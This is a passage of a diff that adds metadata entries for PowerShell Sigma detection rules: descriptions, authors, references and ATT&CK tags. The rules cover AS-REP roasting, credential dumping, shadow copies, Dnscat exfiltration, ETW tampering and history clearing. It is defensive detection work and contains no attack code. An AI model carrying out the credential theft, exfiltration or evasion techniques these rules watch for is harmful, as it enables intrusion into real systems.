"attack.s0363" 
+ ] + }, + "uuid": "3ceb2083-a27f-449a-be33-14ec1b7cc973", + "value": "Silence.EDA Detection" + }, + { + "description": "Detects AS-REP roasting is an attack that is often-overlooked. It is not very common as you have to explicitly set accounts that do not require pre-authentication.", + "meta": { + "author": "frack113", + "creation_date": "2022/03/17", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_as_rep_roasting.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md#atomic-test-11---get-aduser-enumeration-using-useraccountcontrol-flags-as-rep-roasting", + "https://shellgeek.com/useraccountcontrol-flags-to-manipulate-properties/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_as_rep_roasting.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033" + ] + }, + "uuid": "96c982fe-3d08-4df4-bed2-eb14e02f21c8", + "value": "Get-ADUser Enumeration Using UserAccountControl Flags" + }, + { + "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", + "meta": { + "author": "frack113", + "creation_date": "2021/07/28", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_automated_collection.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_automated_collection.yml" + ], + "tags": [ + "attack.collection", + "attack.t1119" + ] + }, + "uuid": "c1dda054-d638-4c16-afc8-53e007f3fbc5", + "value": "Automated Collection Command PowerShell" + }, + { + 
"description": "Detects the execution of AzureHound in PowerShell, a tool to gather data from Azure for BloodHound", + "meta": { + "author": "Austin Songer (@austinsonger)", + "creation_date": "2021/10/23", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_azurehound_commands.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1", + "https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_azurehound_commands.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1482", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1069" + ] + }, + "uuid": "83083ac6-1816-4e76-97d7-59af9a9ae46e", + "value": "AzureHound PowerShell Commands" + }, + { + "description": "Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation.\nScreen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/28", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_capture_screenshots.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-6---windows-screen-capture-copyfromscreen", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_capture_screenshots.yml" + ], + "tags": [ + "attack.collection", + "attack.t1113" + ] + }, + "uuid": "d4a11f63-2390-411c-9adf-d791fd152830", + "value": "Windows Screen Capture with 
CopyFromScreen" + }, + { + "description": "Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/11/25", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_clearing_windows_console_history.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://stefanos.cloud/blog/kb/how-to-clear-the-powershell-command-history/", + "https://www.shellhacks.com/clear-history-powershell/", + "https://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_clearing_windows_console_history.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070", + "attack.t1070.003" + ] + }, + "uuid": "bde47d4b-9987-405c-94c7-b080410e8ea7", + "value": "Clearing Windows Console History" + }, + { + "description": "Detects keywords that could indicate clearing PowerShell history", + "meta": { + "author": "Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2022/01/25", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_clear_powershell_history.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://gist.github.com/hook-s3c/7363a856c3cdbadeb71085147f042c1a", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_clear_powershell_history.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.003" + ] + }, + "uuid": "26b692dc-1722-49b2-b496-a8258aa6371d", + "value": "Clear PowerShell History - PowerShell" + }, + { + "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", + "meta": { + 
"author": "oscd.community, Natalia Shornikova", + "creation_date": "2020/10/14", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_cl_invocation_lolscript.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/", + "https://twitter.com/bohops/status/948061991012327424", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cl_invocation_lolscript.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ] + }, + "uuid": "4cd29327-685a-460e-9dac-c3ab96e549dc", + "value": "Execution via CL_Invocation.ps1 - Powershell" + }, + { + "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", + "meta": { + "author": "oscd.community, Natalia Shornikova", + "creation_date": "2020/10/14", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_cl_invocation_lolscript_count.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/", + "https://twitter.com/bohops/status/948061991012327424", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cl_invocation_lolscript_count.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ] + }, + "uuid": "f588e69b-0750-46bb-8f87-0e9320d57536", + "value": "Execution via CL_Invocation.ps1 (2 Lines)" + }, + { + "description": "Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module", + "meta": { + "author": "oscd.community, Natalia Shornikova", + "creation_date": "2020/10/14", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_cl_mutexverifiers_lolscript.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/", + 
"https://twitter.com/pabraeken/status/995111125447577600", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cl_mutexverifiers_lolscript.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ] + }, + "uuid": "39776c99-1c7b-4ba0-b5aa-641525eee1a4", + "value": "Execution via CL_Mutexverifiers.ps1" + }, + { + "description": "Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module", + "meta": { + "author": "oscd.community, Natalia Shornikova", + "creation_date": "2020/10/14", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_cl_mutexverifiers_lolscript_count.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/", + "https://twitter.com/pabraeken/status/995111125447577600", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cl_mutexverifiers_lolscript_count.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ] + }, + "uuid": "6609c444-9670-4eab-9636-fe4755a851ce", + "value": "Execution via CL_Mutexverifiers.ps1 (2 Lines)" + }, + { + "description": "Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code", + "meta": { + "author": "frack113", + "creation_date": "2021/12/28", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_cmdlet_scheduled_task.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-4---powershell-cmdlet-scheduled-task", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-6---wmi-invoke-cimmethod-scheduled-task", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cmdlet_scheduled_task.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1053.005"
+ ]
+ },
+ "uuid": "363eccc0-279a-4ccf-a3ab-24c2e63b11fb",
+ "value": "Powershell Create Scheduled Task"
+ },
+ {
+ "description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/11/17",
+ "falsepositive": [
+ "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often"
+ ],
+ "filename": "posh_ps_computer_discovery_get_adcomputer.yml",
+ "level": "medium",
+ "logsource.category": "ps_script",
+ "logsource.product": "windows",
+ "refs": [
+ "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
+ "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_computer_discovery_get_adcomputer.yml"
+ ],
+ "tags": [
+ "attack.discovery",
+ "attack.t1033"
+ ]
+ },
+ "uuid": "db885529-903f-4c5d-9864-28fe199e6370",
+ "value": "Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell"
+ },
+ {
+ "description": "Uses PowerShell to install/copy a a file into a system directory such as \"System32\" or \"SysWOW64\"",
+ "meta": {
+ "author": "frack113, Nasreddine Bencherchali",
+ "creation_date": "2021/12/27",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "posh_ps_copy_item_system_directory.yml",
+ "level": "high",
+ "logsource.category": "ps_script",
+ "logsource.product": "windows",
+ "refs": [ 
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1556.002/T1556.002.md#atomic-test-1---install-and-register-password-filter-dll",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_copy_item_system_directory.yml"
+ ],
+ "tags": [
+ "attack.credential_access",
+ "attack.t1556.002"
+ ]
+ },
+ "uuid": "63bf8794-9917-45bc-88dd-e1b5abc0ecfd",
+ "value": "Powershell Install a DLL in System Directory"
+ },
+ {
+ "description": "Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR.\nThe COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR).\nThese profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.\n(Citation: Microsoft Profiling Mar 2017)\n(Citation: Microsoft COR_PROFILER Feb 2013)\n",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2021/12/30",
+ "falsepositive": [
+ "Legitimate administrative script"
+ ],
+ "filename": "posh_ps_cor_profiler.yml",
+ "level": "medium",
+ "logsource.category": "ps_script",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.012/T1574.012.md#atomic-test-3---registry-free-process-scope-cor_profiler",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cor_profiler.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1574.012"
+ ]
+ },
+ "uuid": "23590215-4702-4a70-8805-8dc9e58314a2",
+ "value": "Registry-Free Process Scope COR_PROFILER"
+ },
+ {
+ "description": "Detects creation of a local user via PowerShell",
+ "meta": {
+ "author": "@ROxPinTeddy",
+ "creation_date": "2020/04/11",
+ "falsepositive": [
+ 
"Legitimate user creation"
+ ],
+ "filename": "posh_ps_create_local_user.yml",
+ "level": "medium",
+ "logsource.category": "ps_script",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_create_local_user.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1059.001",
+ "attack.persistence",
+ "attack.t1136.001"
+ ]
+ },
+ "uuid": "243de76f-4725-4f2e-8225-a8a69b15ad61",
+ "value": "PowerShell Create Local User"
+ },
+ {
+ "description": "Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2022/01/12",
+ "falsepositive": [
+ "Legitimate PowerShell scripts"
+ ],
+ "filename": "posh_ps_create_volume_shadow_copy.yml",
+ "level": "high",
+ "logsource.category": "ps_script",
+ "logsource.product": "windows",
+ "refs": [
+ "https://attack.mitre.org/datasources/DS0005/",
+ "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_create_volume_shadow_copy.yml"
+ ],
+ "tags": [
+ "attack.credential_access",
+ "attack.t1003.003"
+ ]
+ },
+ "uuid": "afd12fed-b0ec-45c9-a13d-aa86625dac81",
+ "value": "Create Volume Shadow Copy with Powershell"
+ },
+ {
+ "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.",
+ "meta": {
+ "author": "Timur Zinniatullin, oscd.community",
+ "creation_date": "2019/10/21",
+ "falsepositive": [
+ "Highly likely if archive operations are done via PowerShell." 
+ ],
+ "filename": "posh_ps_data_compressed.yml",
+ "level": "low",
+ "logsource.category": "ps_script",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560/T1560.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_data_compressed.yml"
+ ],
+ "tags": [
+ "attack.exfiltration",
+ "attack.t1560"
+ ]
+ },
+ "uuid": "6dc5d284-69ea-42cf-9311-fb1c3932a69a",
+ "value": "Data Compressed - PowerShell"
+ },
+ {
+ "description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments.\nThis may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox\n",
+ "meta": {
+ "author": "frack113, Duc.Le-GTSC",
+ "creation_date": "2021/08/03",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "posh_ps_detect_vm_env.yml",
+ "level": "medium",
+ "logsource.category": "ps_script",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1497.001/T1497.001.md",
+ "https://techgenix.com/malicious-powershell-scripts-evade-detection/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_detect_vm_env.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1497.001"
+ ]
+ },
+ "uuid": "d93129cd-1ee0-479f-bc03-ca6f129882e3",
+ "value": "Powershell Detect Virtualization Environment"
+ },
+ {
+ "description": "Enumerates Active Directory to determine computers that are joined to the domain",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2022/02/12",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "posh_ps_directorysearcher.yml",
+ "level": "medium",
+ "logsource.category": "ps_script",
+ "logsource.product": "windows",
+ "refs": [
+ 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md#atomic-test-15---enumerate-domain-computers-within-active-directory-using-directorysearcher",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_directorysearcher.yml"
+ ],
+ "tags": [
+ "attack.discovery",
+ "attack.t1018"
+ ]
+ },
+ "uuid": "1f6399cf-2c80-4924-ace1-6fcff3393480",
+ "value": "DirectorySearcher Powershell Exploitation"
+ },
+ {
+ "description": "Adversaries may create a domain account to maintain access to victim systems.\nDomain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain..\n",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2021/12/28",
+ "falsepositive": [
+ "Legitimate administrative script"
+ ],
+ "filename": "posh_ps_directoryservices_accountmanagement.yml",
+ "level": "medium",
+ "logsource.category": "ps_script",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.002/T1136.002.md#atomic-test-3---create-a-new-domain-account-using-powershell",
+ "https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.accountmanagement?view=dotnet-plat-ext-6.0",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_directoryservices_accountmanagement.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1136.002"
+ ]
+ },
+ "uuid": "b29a93fb-087c-4b5b-a84d-ee3309e69d08",
+ "value": "Manipulation of User Computer or Group Security Principals Across AD"
+ },
+ {
+ "description": "Detects scripts or commands that disabled the Powershell command history by removing psreadline module",
+ "meta": {
+ "author": "Ali Alwashali",
+ "creation_date": "2022/08/21",
+ "falsepositive": [
+ "Legitimate script that disables 
the command history"
+ ],
+ "filename": "posh_ps_disable_psreadline_command_history.yml",
+ "level": "high",
+ "logsource.category": "ps_script",
+ "logsource.product": "windows",
+ "refs": [
+ "https://twitter.com/DissectMalware/status/1062879286749773824",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_disable_psreadline_command_history.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1070.003"
+ ]
+ },
+ "uuid": "602f5669-6927-4688-84db-0d4b7afb2150",
+ "value": "Disable Powershell Command History"
+ },
+ {
+ "description": "Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2022/09/10",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "posh_ps_disable_windowsoptionalfeature.yml",
+ "level": "high",
+ "logsource.category": "ps_script",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/5b67c9b141fa3918017f8fa44f2f88f0b1ecb9e1/atomics/T1562.001/T1562.001.md",
+ "https://docs.microsoft.com/en-us/powershell/module/dism/disable-windowsoptionalfeature?view=windowsserver2022-ps",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1562.001"
+ ]
+ },
+ "uuid": "99c4658d-2c5e-4d87-828d-7c066ca537c3",
+ "value": "Disable-WindowsOptionalFeature Command PowerShell"
+ },
+ {
+ "description": "Dnscat exfiltration tool execution",
+ "meta": {
+ "author": "Daniil Yugoslavskiy, oscd.community",
+ "creation_date": "2019/10/24",
+ "falsepositive": [
+ "Legitimate usage of PowerShell Dnscat2 — DNS Exfiltration tool (unlikely)"
+ ],
+ "filename": 
"posh_ps_dnscat_execution.yml",
+ "level": "critical",
+ "logsource.category": "ps_script",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_dnscat_execution.yml"
+ ],
+ "tags": [
+ "attack.exfiltration",
+ "attack.t1048",
+ "attack.execution",
+ "attack.t1059.001"
+ ]
+ },
+ "uuid": "a6d67db4-6220-436d-8afc-f3842fe05d43",
+ "value": "Dnscat Execution"
+ },
+ {
+ "description": "Adversaries may search for common password storage locations to obtain user credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.\n",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2021/12/20",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "posh_ps_dump_password_windows_credential_manager.yml",
+ "level": "medium",
+ "logsource.category": "ps_script",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555/T1555.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_dump_password_windows_credential_manager.yml"
+ ],
+ "tags": [
+ "attack.credential_access",
+ "attack.t1555"
+ ]
+ },
+ "uuid": "99c49d9c-34ea-45f7-84a7-4751ae6b2cbc",
+ "value": "Dump Credentials from Windows Credential Manager With PowerShell"
+ },
+ {
+ "description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). 
The adversary may then perform actions as the logged-on user.",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2022/01/07",
+ "falsepositive": [
+ "Legitimate script"
+ ],
+ "filename": "posh_ps_enable_psremoting.yml",
+ "level": "medium",
+ "logsource.category": "ps_script",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-1---enable-windows-remote-management",
+ "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7.2",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enable_psremoting.yml"
+ ],
+ "tags": [
+ "attack.lateral_movement",
+ "attack.t1021.006"
+ ]
+ },
+ "uuid": "991a9744-f2f0-44f2-bd33-9092eba17dc3",
+ "value": "Enable Windows Remote Management"
+ },
+ {
+ "description": "Detect built in PowerShell cmdlet Enable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2022/09/10",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "posh_ps_enable_windowsoptionalfeature.yml",
+ "level": "medium",
+ "logsource.category": "ps_script",
+ "logsource.product": "windows",
+ "refs": [
+ "https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enable_windowsoptionalfeature.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion"
+ ]
+ },
+ "uuid": "55c925c1-7195-426b-a136-a9396800e29b",
+ "value": "Enable-WindowsOptionalFeature Command PowerShell"
+ },
+ {
+ "description": "Adversaries may search for common password storage locations to obtain user 
credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.\n",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2021/12/20",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "posh_ps_enumerate_password_windows_credential_manager.yml",
+ "level": "medium",
+ "logsource.category": "ps_script",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555/T1555.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enumerate_password_windows_credential_manager.yml"
+ ],
+ "tags": [
+ "attack.credential_access",
+ "attack.t1555"
+ ]
+ },
+ "uuid": "603c6630-5225-49c1-8047-26c964553e0e",
+ "value": "Enumerate Credentials from Windows Credential Manager With PowerShell"
+ },
+ {
+ "description": "Detects usage of powershell cmdlets to disable or remove ETW trace sessions",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/06/28",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "posh_ps_etw_trace_evasion.yml",
+ "level": "high",
+ "logsource.category": "ps_script",
+ "logsource.product": "windows",
+ "refs": [
+ "https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_etw_trace_evasion.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1070",
+ "attack.t1562.006",
+ "car.2016-04-002"
+ ]
+ },
+ "uuid": "115fdba9-f017-42e6-84cf-d5573bf2ddf8",
+ "value": "Disable of ETW Trace - Powershell"
+ },
+ {
+ "description": "Detects usage of the powerShell Set-Mailbox Cmdlet to set-up an SMTP forwarding rule.",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/10/26",
+ "falsepositive": [
+ "Legitimate usage of the cmdlet to forward 
emails"
+ ],
+ "filename": "posh_ps_exchange_mailbox_smpt_forwarding_rule.yml",
+ "level": "medium",
+ "logsource.category": "ps_script",
+ "logsource.product": "windows",
+ "refs": [
+ "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_exchange_mailbox_smpt_forwarding_rule.yml"
+ ],
+ "tags": [
+ "attack.exfiltration"
+ ]
+ },
+ "uuid": "15b7abbb-8b40-4d01-9ee2-b51994b1d474",
+ "value": "Suspicious PowerShell Mailbox SMTP Forward Rule"
+ },
+ {
+ "description": "Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.\nAdversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors,\nincluding whether or not the adversary fully infects the target and/or attempts specific actions.\n",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2021/12/15",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "posh_ps_file_and_directory_discovery.yml",
+ "level": "low",
+ "logsource.category": "ps_script",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_file_and_directory_discovery.yml"
+ ],
+ "tags": [
+ "attack.discovery",
+ "attack.t1083"
+ ]
+ },
+ "uuid": "d23f2ba5-9da0-4463-8908-8ee47f614bb9",
+ "value": "Powershell File and Directory Discovery"
+ },
+ {
+ "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in 
order to launch their own code at Service start.\nWindows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services\n",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2021/12/30",
+ "falsepositive": [
+ "Legitimate administrative script"
+ ],
+ "filename": "posh_ps_get_acl_service.yml",
+ "level": "medium",
+ "logsource.category": "ps_script",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-1---service-registry-permissions-weakness",
+ "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/get-acl?view=powershell-7.2",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_acl_service.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1574.011"
+ ]
+ },
+ "uuid": "95afc12e-3cbb-40c3-9340-84a032e596a3",
+ "value": "Service Registry Permissions Weakness Check"
+ },
+ {
+ "description": "Detects usage of the \"Get-AdComputer\" to enumerate Computers within Active Directory.",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2022/03/17",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "posh_ps_get_adcomputer.yml",
+ "level": "low",
+ "logsource.category": "ps_script",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md",
